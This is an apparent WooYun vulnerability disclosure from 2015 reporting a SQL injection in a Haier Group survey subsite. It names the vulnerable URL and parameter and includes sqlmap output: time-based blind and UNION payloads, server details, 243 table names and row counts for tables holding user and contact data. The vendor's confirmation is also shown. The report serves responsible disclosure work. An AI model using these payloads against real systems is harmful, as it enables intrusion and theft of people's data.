海尔集团某分站SQL注入泄露大量数据 | wooyun-2015-0120824| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0120824

漏洞标题：海尔集团某分站SQL注入泄露大量数据

漏洞作者： missy

提交时间：2015-06-16 16:56

修复时间：2015-08-03 18:36

公开时间：2015-08-03 18:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-16：细节已通知厂商并且等待厂商处理中
2015-06-19：厂商已经确认，细节仅向厂商公开
2015-06-29：细节向核心白帽子及相关领域专家公开
2015-07-09：细节向普通白帽子公开
2015-07-19：细节向实习白帽子公开
2015-08-03：细节向公众公开

简要描述：

详细说明：

注入点：http://s.haier.com/sr/ajax/getJirSassIcon.jsp?surveyid=

参数：surveyid

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: surveyid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: surveyid=' AND (SELECT * FROM (SELECT(SLEEP(5)))VbuY) AND 'KVOw'='KVOw
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: surveyid=' UNION ALL SELECT NULL,CONCAT(0x716b6b6a71,0x664778526542576e6272,0x7178707171),NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows
web application technology: Apache 2.2.9, JSP
back-end DBMS: MySQL 5.0.12
Database: newsurvey
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: surveyid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: surveyid=' AND (SELECT * FROM (SELECT(SLEEP(5)))VbuY) AND 'KVOw'='KVOw
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: surveyid=' UNION ALL SELECT NULL,CONCAT(0x716b6b6a71,0x664778526542576e6272,0x7178707171),NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows
web application technology: Apache 2.2.9, JSP
back-end DBMS: MySQL 5.0.12
Database: newsurvey
[243 tables]
+-------------------------------+
| jir_fk_mydpf-bak20140919      |
| jir_fk_mydpf-bak20140923      |
| jir_fk_mydpf-bk14093001       |
| jir_fk_mydpf-bk140930         |
| jir_fk_mydpf-bk20140919-final |
| fc_bans                       |
| fc_bot                        |
| fc_bots                       |
| fc_config                     |
| fc_config_chats               |
| fc_config_instances           |
| fc_config_main                |
| fc_config_values              |
| fc_connections                |
| fc_conversationlog            |
| fc_dstore                     |
| fc_gmcache                    |
| fc_gossip                     |
| fc_ignors                     |
| fc_messages                   |
| fc_patterns                   |
| fc_paypal_log                 |
| fc_rooms                      |
| fc_templates                  |
| fc_thatindex                  |
| fc_thatstack                  |
| fc_users                      |
| jir_accessapily               |
| jir_accesslogs                |
| jir_accountsurvey             |
| jir_activities                |
| jir_activitytable             |
| jir_addressbook               |
| jir_advertise                 |
| jir_aggregates                |
| jir_alliances                 |
| jir_annex                     |
| jir_answerip                  |
| jir_attachs                   |
| jir_blacklist                 |
| jir_blackwords                |
| jir_busactive                 |
| jir_businesssurveys           |
| jir_cartype                   |
| jir_citylevel                 |
| jir_config_param              |
| jir_database                  |
| jir_dataprivileges            |
| jir_dialogue                  |
| jir_discus_app                |
| jir_discus_app_bak150421      |
| jir_discus_app_bak150427      |
| jir_discus_app_bak150431      |
| jir_discus_app_bak150605      |
| jir_discus_app_bak150612      |
| jir_discus_app_bak20150407    |
| jir_discus_app_bak20150410    |
| jir_discus_forms              |
| jir_discus_forms_bak140617    |
| jir_discus_forms_bak140711    |
| jir_discus_forms_bak150507    |
| jir_discus_forms_bak150605    |
| jir_discus_reply              |
| jir_discus_reply_bak140617    |
| jir_district                  |
| jir_dyproperty                |
| jir_email_phone               |
| jir_filterquestionindex       |
| jir_fk_auth                   |
| jir_fk_email_log              |
| jir_fk_embedded               |
| jir_fk_embedded_bak140617     |
| jir_fk_embedded_bak150123     |
| jir_fk_huifu                  |
| jir_fk_jingyingti_count       |
| jir_fk_jingyingti_info        |
| jir_fk_jingyingti_log         |
| jir_fk_jingyingti_pinglun     |
| jir_fk_jingyingti_week_log    |
| jir_fk_mydpf                  |
| jir_fk_mydpf_bak140617        |
| jir_fk_mydpf_bak150507        |
| jir_fk_mydpf_bak150605        |
| jir_fk_statistics             |
| jir_fk_system_count           |
| jir_fk_system_info            |
| jir_fk_temp_pingjia           |
| jir_fk_tmp_huifu              |
| jir_fk_tmp_pingfen            |
| jir_forum                     |
| jir_fourth_indicator_score    |
| jir_fourthindicators          |
| jir_freeze                    |
| jir_freply                    |
| jir_goldcoin                  |
| jir_groups                    |
| jir_guest_schedule            |
| jir_haiersurvey               |
| jir_indicator_score           |
| jir_indicators                |
| jir_integraldetails           |
| jir_invertmember              |
| jir_item                      |
| jir_item_operate_data         |
| jir_item_tuser                |
| jir_joinsurveystatus          |
| jir_log                       |
| jir_logoutuser                |
| jir_mac                       |
| jir_media                     |
| jir_mediadiv                  |
| jir_mediamould                |
| jir_medianame                 |
| jir_medianode                 |
| jir_mediaresult               |
| jir_message_board             |
| jir_messages                  |
| jir_mobile_business           |
| jir_mobileanswer              |
| jir_modelnorm                 |
| jir_object_types              |
| jir_objects                   |
| jir_observed                  |
| jir_observed_comment          |
| jir_offlinedata               |
| jir_operation                 |
| jir_orders                    |
| jir_otherservices             |
| jir_paidalipay                |
| jir_parameters                |
| jir_permissions               |
| jir_personactive              |
| jir_pnmodel                   |
| jir_portal_use                |
| jir_privileged_users          |
| jir_privilegeopid             |
| jir_privileges                |
| jir_process                   |
| jir_project_info              |
| jir_projectcontent            |
| jir_projectprivilege          |
| jir_psychological             |
| jir_psychological_scores      |
| jir_psychological_tests       |
| jir_public_sample_lib         |
| jir_publishaward              |
| jir_quality_control           |
| jir_quota                     |
| jir_quota_model               |
| jir_quota_new                 |
| jir_recharge                  |
| jir_recharge_type             |
| jir_recommendmembers          |
| jir_recommendusers            |
| jir_recordope                 |
| jir_release                   |
| jir_report_prepare            |
| jir_report_prepare_detail     |
| jir_reputation_degree_detail  |
| jir_reputioninfo              |
| jir_response_not_r            |
| jir_responsequality           |
| jir_result                    |
| jir_review                    |
| jir_role                      |
| jir_roleoperation             |
| jir_saas                      |
| jir_saas_icon                 |
| jir_saas_survey               |
| jir_saasadmin                 |
| jir_sad_value                 |
| jir_saminfo                   |
| jir_sample                    |
| jir_sample_car                |
| jir_sample_conditions         |
| jir_sample_financy            |
| jir_sample_house              |
| jir_sample_mapping            |
| jir_sample_motherhood         |
| jir_sampleinfo                |
| jir_samplemobile              |
| jir_samplemuetxanswer         |
| jir_sampleservices            |
| jir_search_seq                |
| jir_sec_reply                 |
| jir_send_mroc                 |
| jir_sendemail                 |
| jir_sendtd8                   |
| jir_statistics_on             |
| jir_subjects                  |
| jir_survey_grouprand          |
| jir_survey_properties         |
| jir_survey_sent               |
| jir_survey_upgrade            |
| jir_surveyanswers             |
| jir_surveycollections         |
| jir_surveycount               |
| jir_surveynode                |
| jir_surveyrandom              |
| jir_surveyreport              |
| jir_surveyresponses           |
| jir_sysuser                   |
| jir_tauthority                |
| jir_tbaccessfail              |
| jir_tbblackuser               |
| jir_tbdistinguish             |
| jir_td8unionsurvey            |
| jir_td8unionsurveyuser        |
| jir_temporary                 |
| jir_theme_model               |
| jir_thirdindicators           |
| jir_tmbody                    |
| jir_tproduct                  |
| jir_trole                     |
| jir_trole_authority           |
| jir_union                     |
| jir_unionanswers              |
| jir_unionregister             |
| jir_unionweb                  |
| jir_upgrade_remind            |
| jir_upresult                  |
| jir_usecount                  |
| jir_user                      |
| jir_user_testpl               |
| jir_userinfo                  |
| jir_usersample                |
| jir_validate_phone            |
| jir_version                   |
| jir_video                     |
| jir_webpayorder               |
| jir_wkmonitor                 |
| mail_delivertask              |
| mail_owner                    |
| mail_sendlist                 |
| mroc_release                  |
| mroccoredb                    |
| phonelist                     |
| pre_forum_node                |
| t_demands                     |
| t_department                  |
| t_idm_user                    |
| t_operationdepartment         |
| users                         |
+-------------------------------+
Database: newsurvey
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| jir_surveyresponses             | 841835  |
| jir_responsequality             | 756593  |
| jir_unionanswers                | 719054  |
| jir_businesssurveys             | 672558  |
| jir_objects                     | 198708  |
| jir_aggregates                  | 195310  |
| jir_user                        | 172738  |
| jir_fk_statistics               | 172603  |
| fc_patterns                     | 148533  |
| jir_mobile_business             | 76269   |
| jir_user_testpl                 | 64421   |
| jir_addressbook                 | 50998   |
| jir_freply                      | 39119   |
| jir_result                      | 38321   |
| fc_templates                    | 22634   |
| jir_accesslogs                  | 20269   |
| jir_fk_mydpf                    | 16703   |
| jir_fk_mydpf_bak150605          | 16518   |
| jir_fk_mydpf_bak150507          | 15858   |
| jir_recordope                   | 12188   |
| jir_discus_forms_bak150507      | 9178    |
| jir_discus_forms                | 8970    |
| jir_discus_forms_bak150605      | 8150    |
| jir_sec_reply                   | 7998    |
| `jir_fk_mydpf-bk14093001`       | 7759    |
| `jir_fk_mydpf-bk140930`         | 7688    |
| `jir_fk_mydpf-bak20140923`      | 7259    |
| `jir_fk_mydpf-bk20140919-final` | 7182    |
| `jir_fk_mydpf-bak20140919`      | 7054    |
| jir_fk_email_log                | 5650    |
| jir_fk_jingyingti_pinglun       | 5220    |
| jir_portal_use                  | 4151    |
| jir_discus_reply                | 3987    |
| jir_fk_huifu                    | 3964    |
| jir_roleoperation               | 3569    |
| jir_surveycount                 | 3335    |
| jir_fk_jingyingti_log           | 2891    |
| jir_district                    | 2853    |
| jir_survey_sent                 | 1891    |
| jir_fk_tmp_pingfen              | 1849    |
| jir_wkmonitor                   | 1846    |
| jir_fk_embedded                 | 1725    |
| jir_fk_embedded_bak150123       | 1560    |
| jir_quota_new                   | 1477    |
| fc_config_values                | 1468    |
| fc_config                       | 1445    |
| jir_surveynode                  | 1380    |
| jir_operation                   | 1251    |
| jir_fk_mydpf_bak140617          | 1224    |
| mail_sendlist                   | 1132    |
| fc_messages                     | 851     |
| jir_discus_forms_bak140711      | 802     |
| jir_cartype                     | 668     |
| jir_fk_tmp_huifu                | 659     |
| jir_fk_temp_pingjia             | 621     |
| jir_userinfo                    | 593     |
| users                           | 593     |
| jir_usecount                    | 528     |
| jir_discus_reply_bak140617      | 517     |
| jir_fk_system_count             | 455     |
| jir_fk_system_info              | 455     |
| jir_discus_forms_bak140617      | 388     |
| jir_personactive                | 381     |
| jir_fk_jingyingti_week_log      | 370     |
| jir_discus_app                  | 313     |
| jir_discus_app_bak150612        | 311     |
| jir_discus_app_bak150605        | 304     |
| jir_citylevel                   | 297     |
| jir_discus_app_bak150431        | 292     |
| jir_discus_app_bak150427        | 283     |
| jir_haiersurvey                 | 276     |
| jir_discus_app_bak150421        | 271     |
| jir_fk_embedded_bak140617       | 266     |
| jir_discus_app_bak20150410      | 263     |
| jir_discus_app_bak20150407      | 258     |
| jir_survey_grouprand            | 251     |
| jir_logoutuser                  | 230     |
| jir_forum                       | 227     |
| jir_quota_model                 | 213     |
| jir_tbaccessfail                | 197     |
| jir_project_info                | 170     |
| jir_projectprivilege            | 151     |
| jir_sample_conditions           | 144     |
| jir_saas                        | 134     |
| jir_sendtd8                     | 133     |
| jir_medianode                   | 121     |
| jir_process                     | 112     |
| jir_guest_schedule              | 109     |
| jir_joinsurveystatus            | 108     |
| jir_mediamould                  | 107     |
| jir_saas_survey                 | 104     |
| jir_reputation_degree_detail    | 103     |
| jir_busactive                   | 101     |
| jir_send_mroc                   | 96      |
| jir_indicator_score             | 94      |
| jir_release                     | 94      |
| jir_fourth_indicator_score      | 91      |
| jir_public_sample_lib           | 87      |
| jir_thirdindicators             | 87      |
| mail_delivertask                | 80      |
| fc_users                        | 79      |
| jir_webpayorder                 | 76      |
| jir_item_tuser                  | 74      |
| jir_dyproperty                  | 73      |
| fc_rooms                        | 72      |
| jir_upgrade_remind              | 61      |
| jir_item                        | 58      |
| jir_message_board               | 55      |
| jir_sample                      | 51      |
| jir_item_operate_data           | 42      |
| jir_mediaresult                 | 42      |
| jir_fk_auth                     | 41      |
| jir_tmbody                      | 39      |
| jir_quota                       | 36      |
| jir_survey_properties           | 36      |
| jir_indicators                  | 35      |
| jir_psychological_scores        | 35      |
| jir_media                       | 34      |
| jir_object_types                | 34      |
| jir_fourthindicators            | 30      |
| jir_sad_value                   | 29      |
| jir_pnmodel                     | 27      |
| fc_bot                          | 26      |
| jir_email_phone                 | 25      |
| jir_saminfo                     | 24      |
| jir_surveyreport                | 23      |
| jir_statistics_on               | 21      |
| jir_tbdistinguish               | 20      |
| jir_sample_mapping              | 17      |
| jir_saas_icon                   | 16      |
| jir_sysuser                     | 13      |
| jir_trole_authority             | 13      |
| mail_owner                      | 13      |
| jir_dialogue                    | 12      |
| jir_filterquestionindex         | 12      |
| jir_observed_comment            | 11      |
| jir_theme_model                 | 10      |
| jir_fk_jingyingti_count         | 9       |
| jir_fk_jingyingti_info          | 9       |
| jir_validate_phone              | 8       |
| jir_freeze                      | 7       |
| jir_psychological_tests         | 7       |
| t_demands                       | 6       |
| jir_privileges                  | 5       |
| jir_tauthority                  | 5       |
| jir_td8unionsurveyuser          | 5       |
| jir_trole                       | 5       |
| jir_unionweb                    | 5       |
| jir_accessapily                 | 4       |
| jir_blacklist                   | 4       |
| jir_psychological               | 4       |
| jir_quality_control             | 4       |
| jir_recharge_type               | 4       |
| jir_saasadmin                   | 4       |
| jir_samplemobile                | 4       |
| jir_tproduct                    | 4       |
| t_department                    | 4       |
| fc_config_main                  | 3       |
| jir_video                       | 3       |
| t_operationdepartment           | 3       |
| fc_ignors                       | 2       |
| jir_config_param                | 2       |
| jir_messages                    | 2       |
| jir_orders                      | 2       |
| jir_report_prepare              | 2       |
| jir_report_prepare_detail       | 2       |
| jir_search_seq                  | 2       |
| t_idm_user                      | 2       |
| fc_bots                         | 1       |
| fc_config_chats                 | 1       |
| fc_config_instances             | 1       |
| fc_connections                  | 1       |
| jir_advertise                   | 1       |
| jir_blackwords                  | 1       |
| jir_permissions                 | 1       |
| jir_privileged_users            | 1       |
| jir_reputioninfo                | 1       |
| jir_response_not_r              | 1       |
| jir_role                        | 1       |
| jir_sampleinfo                  | 1       |
| jir_subjects                    | 1       |
| jir_td8unionsurvey              | 1       |
| jir_upresult                    | 1       |
+---------------------------------+---------+

漏洞证明：

修复方案：

过滤

版权声明：转载请注明来源 missy@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2015-06-19 18:34

厂商回复：

感谢乌云平台白帽子的测试与提醒，我方已安排人员进行处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0120824

漏洞标题：海尔集团某分站SQL注入泄露大量数据

相关厂商：海尔集团

漏洞作者： missy

提交时间：2015-06-16 16:56

修复时间：2015-08-03 18:36

公开时间：2015-08-03 18:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 missy@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0120824

漏洞标题：海尔集团某分站SQL注入泄露大量数据

相关厂商：海尔集团

漏洞作者： missy

提交时间：2015-06-16 16:56

修复时间：2015-08-03 18:36

公开时间：2015-08-03 18:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0120824"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 missy@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：